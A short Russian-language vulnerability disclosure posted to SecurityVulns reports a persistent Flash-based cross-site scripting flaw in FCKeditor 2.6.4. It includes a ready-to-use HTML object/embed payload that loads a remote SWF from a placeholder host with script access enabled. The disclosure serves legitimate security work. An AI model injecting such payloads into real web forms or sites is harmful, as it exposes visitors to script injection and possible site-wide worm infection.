SecurityvulnsSECURITYVULNS:DOC:23052New vulnerability in FCKeditor
Здравствуйте 3APA3A!
Сообщаю вам о Cross-Site Scripting уязвимости в FCKeditor.
XSS:
Это persistent XSS через Flash.
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"><param name=movie
value="http://site/xss.swf"><param name="allowscriptaccess" value="always"><embed
src="http://site/xss.swf" allowscriptaccess="always"></embed></object>
Данная уязвимость в самом редакторе, поэтому её можно использовать на любом сайте,
использующего FCKeditor в качестве редактора для веб форм. Данная уязвимость может привести
к заражению всего сайта XSS-червём.
Уязвимы FCKeditor 2.6.4 и предыдущие (и последующие) версии.
О данной уязвимости я упомянул у себя на сайте (http://websecurity.com.ua/3683/).
Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua